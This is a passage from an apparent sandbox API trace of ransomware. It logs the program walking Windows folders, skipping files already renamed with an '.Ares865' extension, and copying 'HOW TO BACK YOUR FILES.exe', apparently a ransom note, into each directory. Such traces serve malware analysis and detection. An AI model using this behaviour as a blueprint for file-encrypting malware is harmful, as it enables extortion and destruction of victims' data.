ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x644daae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile34.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.216] lstrcmpiW (lpString1="usertile34.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.216] lstrcmpiW (lpString1="usertile34.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.216] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile34.bmp.Ares865" | out: lpString1="usertile34.bmp.Ares865") returned="usertile34.bmp.Ares865" [0090.216] lstrlenW (lpString="usertile34.bmp.Ares865") returned 22 [0090.216] lstrlenW (lpString="Ares865") returned 7 [0090.216] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.216] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae4fccfe, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae4fccfe, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64526da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile35.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.217] lstrcmpiW (lpString1="usertile35.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.217] lstrcmpiW (lpString1="usertile35.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.217] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile35.bmp.Ares865" | out: lpString1="usertile35.bmp.Ares865") returned="usertile35.bmp.Ares865" [0090.217] lstrlenW (lpString="usertile35.bmp.Ares865") returned 22 [0090.217] lstrlenW (lpString="Ares865") returned 7 [0090.217] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.217] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae548fb8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae548fb8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6454cf00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile36.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.217] lstrcmpiW (lpString1="usertile36.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.217] lstrcmpiW (lpString1="usertile36.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.217] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile36.bmp.Ares865" | out: lpString1="usertile36.bmp.Ares865") returned="usertile36.bmp.Ares865" [0090.217] lstrlenW (lpString="usertile36.bmp.Ares865") returned 22 [0090.217] lstrlenW (lpString="Ares865") returned 7 [0090.217] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.217] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae595272, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae595272, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x645991c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile37.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.217] lstrcmpiW (lpString1="usertile37.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.217] lstrcmpiW (lpString1="usertile37.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.217] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile37.bmp.Ares865" | out: lpString1="usertile37.bmp.Ares865") returned="usertile37.bmp.Ares865" [0090.217] lstrlenW (lpString="usertile37.bmp.Ares865") returned 22 [0090.217] lstrlenW (lpString="Ares865") returned 7 [0090.217] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.217] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5bb3cf, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5bb3cf, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x645bf320, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile38.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.217] lstrcmpiW (lpString1="usertile38.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.217] lstrcmpiW (lpString1="usertile38.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.217] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile38.bmp.Ares865" | out: lpString1="usertile38.bmp.Ares865") returned="usertile38.bmp.Ares865" [0090.217] lstrlenW (lpString="usertile38.bmp.Ares865") returned 22 [0090.217] lstrlenW (lpString="Ares865") returned 7 [0090.218] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.218] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5e152c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae5e152c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x645e5480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile39.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.218] lstrcmpiW (lpString1="usertile39.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.218] lstrcmpiW (lpString1="usertile39.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.218] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile39.bmp.Ares865" | out: lpString1="usertile39.bmp.Ares865") returned="usertile39.bmp.Ares865" [0090.218] lstrlenW (lpString="usertile39.bmp.Ares865") returned 22 [0090.218] lstrlenW (lpString="Ares865") returned 7 [0090.218] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.218] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae607689, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae607689, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x64631740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile40.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.218] lstrcmpiW (lpString1="usertile40.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.218] lstrcmpiW (lpString1="usertile40.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.218] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile40.bmp.Ares865" | out: lpString1="usertile40.bmp.Ares865") returned="usertile40.bmp.Ares865" [0090.218] lstrlenW (lpString="usertile40.bmp.Ares865") returned 22 [0090.218] lstrlenW (lpString="Ares865") returned 7 [0090.218] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.218] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae62d7e6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae62d7e6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6467da00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile41.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.218] lstrcmpiW (lpString1="usertile41.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.218] lstrcmpiW (lpString1="usertile41.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.218] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile41.bmp.Ares865" | out: lpString1="usertile41.bmp.Ares865") returned="usertile41.bmp.Ares865" [0090.218] lstrlenW (lpString="usertile41.bmp.Ares865") returned 22 [0090.218] lstrlenW (lpString="Ares865") returned 7 [0090.218] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.218] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x6467da00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile42.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.218] lstrcmpiW (lpString1="usertile42.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.218] lstrcmpiW (lpString1="usertile42.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.218] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile42.bmp.Ares865" | out: lpString1="usertile42.bmp.Ares865") returned="usertile42.bmp.Ares865" [0090.218] lstrlenW (lpString="usertile42.bmp.Ares865") returned 22 [0090.219] lstrlenW (lpString="Ares865") returned 7 [0090.219] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.219] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae653943, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae653943, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x646a3b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile43.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.219] lstrcmpiW (lpString1="usertile43.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.219] lstrcmpiW (lpString1="usertile43.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.219] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile43.bmp.Ares865" | out: lpString1="usertile43.bmp.Ares865") returned="usertile43.bmp.Ares865" [0090.219] lstrlenW (lpString="usertile43.bmp.Ares865") returned 22 [0090.219] lstrlenW (lpString="Ares865") returned 7 [0090.219] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.219] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile44.bmp.Ares865", cAlternateFileName="")) returned 1 [0090.219] lstrcmpiW (lpString1="usertile44.bmp.Ares865", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.219] lstrcmpiW (lpString1="usertile44.bmp.Ares865", lpString2="aoldtz.exe") returned 1 [0090.219] lstrcpyW (in: lpString1=0x2cce4aa, lpString2="usertile44.bmp.Ares865" | out: lpString1="usertile44.bmp.Ares865") returned="usertile44.bmp.Ares865" [0090.219] lstrlenW (lpString="usertile44.bmp.Ares865") returned 22 [0090.219] lstrlenW (lpString="Ares865") returned 7 [0090.219] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0090.219] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae679aa0, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae679aa0, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0x646c9cc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0xc340, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile44.bmp.Ares865", cAlternateFileName="")) returned 0 [0090.219] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.219] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0090.219] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search" [0090.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0090.219] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.219] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Search") returned 52 [0090.219] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search" [0090.219] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.219] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\search\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.220] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.220] GetLastError () returned 0x0 [0090.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.220] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.220] CloseHandle (hObject=0x120) returned 1 [0090.220] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.220] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.220] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.221] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.221] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.221] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Data" | out: lpString1="Data") returned="Data" [0090.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0090.221] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x74) returned 0x2c1908 [0090.221] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0090.221] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.221] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.221] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0090.221] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0090.221] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a90 [0090.221] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data" [0090.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0090.221] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.221] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data") returned 57 [0090.221] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data" [0090.221] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.221] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\search\\data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.222] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.222] GetLastError () returned 0x0 [0090.222] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.222] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.222] CloseHandle (hObject=0x120) returned 1 [0090.222] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.222] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.222] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27df8b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c551220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.222] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.222] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.223] lstrcpyW (in: lpString1=0x2cce474, lpString2="Applications" | out: lpString1="Applications") returned="Applications" [0090.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a88 [0090.223] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8e) returned 0x320fc8 [0090.223] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a90 | out: ListHead=0x2e7710, ListEntry=0x2e7a90) returned 0x2e7a70 [0090.223] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c551220, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c551220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0090.223] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0090.223] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e1ecc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27e1ecc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27e1ecc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0090.223] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0090.223] lstrcmpiW (lpString1="Temp", lpString2="aoldtz.exe") returned 1 [0090.223] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications" [0090.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0090.223] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a88 | out: hHeap=0x2b0000) returned 1 [0090.223] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications") returned 70 [0090.223] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications" | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications" [0090.223] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.223] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\microsoft\\search\\data\\applications\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.224] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.224] GetLastError () returned 0x0 [0090.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.224] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.224] CloseHandle (hObject=0x120) returned 1 [0090.224] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0090.224] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.224] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4c577380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c577380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.224] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.224] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.225] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC") returned="C:\\Users\\All Users\\Application Data\\Microsoft\\RAC" [0090.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 